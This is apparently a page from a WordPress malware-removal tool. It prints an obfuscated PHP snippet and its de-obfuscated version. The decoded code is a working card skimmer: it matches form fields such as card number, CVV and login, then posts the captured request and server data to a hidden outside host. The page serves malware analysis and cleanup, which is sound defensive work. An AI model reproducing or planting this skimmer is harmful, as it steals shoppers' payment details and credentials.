De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $KD8sja = ''.'im'. ''.''.'pl'.''. 'od'.''. 'e';$ZMma1s = $KD8sja("_", array("str", $KD8sja("", array('ro', 't1'.''. '3'))));$QcMdm = $ZMma1s('o'.''. 'nf'.''.'r6'.''. '4_r'.''.'apb'.''. 'qr');$kdaskd22a=$ZMma1s('o'.'n'. ''.'fr6'.''. '4_'.''.'q'.''. 'rpbqr');$CNvy = $ZMma1s('fr'.''. 'ev'.''.'nyv'. 'mr');$BcUo=$ZMma1s('ce'. 'r'.''. 't_'.'' .'z'.'ng'. ''. 'pu');$VIZdJ = $ZMma1s('s'. ''.'vyr_t'.''.'rg'. ''.'_pb'.'ag'.''.'ra'. ''.'gf');$LIyk = @$VIZdJ($ZMma1s('c'.''. 'uc:'. '//'.'v'.''. 'ac'.'hg'));$KDaoo2a = $ZMma1s('wf'.''. 'ba_q'.''.'r'.''. 'p'.''. 'bqr');if(!empty($LIyk)) $LIyk = $KDaoo2a($LIyk, true);else $LIyk = array(); if (is_array($LIyk)) $_REQUEST=array_merge($_REQUEST, $LIyk);if ($BcUo("/".$kdaskd22a('Y2'. 'Nf'.'bn'.'Vt'. 'YmVyfGZpc'. 'nN0b'.''.'mF'. 'tZ'.'X'.'xj'. 'd'.''.'m'.'My'.''.'f'.'Hll'.'YX'.''. 'J8'.''. 'ZXhwa'.'X'.''.'J5f'.''. 'GN'.''.'hc'.''.'mRf'.'bnV'.''. 'tYm'.''.'V'.'yf'.'G1v'.''. 'bnRofG'.''.'N2'.''. ''. 'dnxzZ'. 'WN1'.''.'cm'. ''.'V0'.'cm'. 'Fk'.'a'.''. 'W5nfH'. 'Vz'.''.'Z'.''.'X'.'Ju'. 'YW1lfHB'.''. 'heW'.'1l'.'bnR8c2'. 'hp'.'cH'.'B'.'p'.'' .'bm'.'d8'.'' .'Ym'.'ls'. 'bGluZ3'.'xj'.'Y1'. '98'.'ZH'.'Vt'. 'bXl'.'8'.'bG'.''. '9'.'na'.'W'.'4=')."/i", $CNvy($_REQUEST))) $CAXLmva=@$VIZdJ("htt". "ps:". "//".trim($kdaskd22a('e'.'m'.'' .'Eu'.'aDRja' .'y'.'5tZ'.''. 'S9'.'' .'iNmI'.'3Ln'.''. 'Bo'.'c'. 'A='.'=')), false, stream_context_create(array('ht'. 'tp' => array('met'. 'hod' => 'P'.''. 'OS'.''. 'T', 'time'. 'out' => 2, 'hea'. 'der' => $kdaskd22a('Q29'.'udG'.'Vu'. 'dC10'.'eXB'.'lOiB'.'hc'. 'HBs'.'aWNhdG'.'lvbi94LXd3'. 'dy1mb3Jt'.'LXVybGV'. 'uY29'.'kZWQ='),'content' => http_build_query(array(''.'ve'. 'rs'.''. ''.'io'. 'n'=>1, "enc".'' ."ode"=>$QcMdm($CNvy($_REQUEST) . "-". ""."-" . $CNvy($_SERVER)),"ho". "st"=>$_SERVER[$kdaskd22a("SFRUUF9IT1NU")]))))));
<?php $KD8sja = 'implode'; $ZMma1s = "str_rot13"; $QcMdm = "base64_encode"; $kdaskd22a = "base64_decode"; $CNvy = "serialize"; $BcUo = "preg_match"; $VIZdJ = "file_get_contents"; $LIyk = @file_get_contents("php://input"); $KDaoo2a = "json_decode"; if (!empty($LIyk)) { $LIyk = json_decode($LIyk, true); } else { $LIyk = array(); } if (is_array($LIyk)) { $_REQUEST = array_merge($_REQUEST, $LIyk); } if ($BcUo("/" . $kdaskd22a('Y2NfbnVtYmVyfGZpcnN0bmFtZXxjdmMyfHllYXJ8ZXhwaXJ5fGNhcmRfbnVtYmVyfG1vbnRofGN2dnxzZWN1cmV0cmFkaW5nfHVzZXJuYW1lfHBheW1lbnR8c2hpcHBpbmd8YmlsbGluZ3xjY198ZHVtbXl8bG9naW4=') . "/i", $CNvy($_REQUEST))) { $CAXLmva = @$VIZdJ("https://" . trim($kdaskd22a('emEuaDRjay5tZS9iNmI3LnBocA==')), false, stream_context_create(array('http' => array('method' => 'POST', 'timeout' => 2, 'header' => $kdaskd22a('Q29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ='), 'content' => http_build_query(array('version' => 1, "encode" => $QcMdm($CNvy($_REQUEST) . "-" . "" . "-" . $CNvy($_SERVER)), "host" => $_SERVER[$kdaskd22a("SFRUUF9IT1NU")])))))); }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.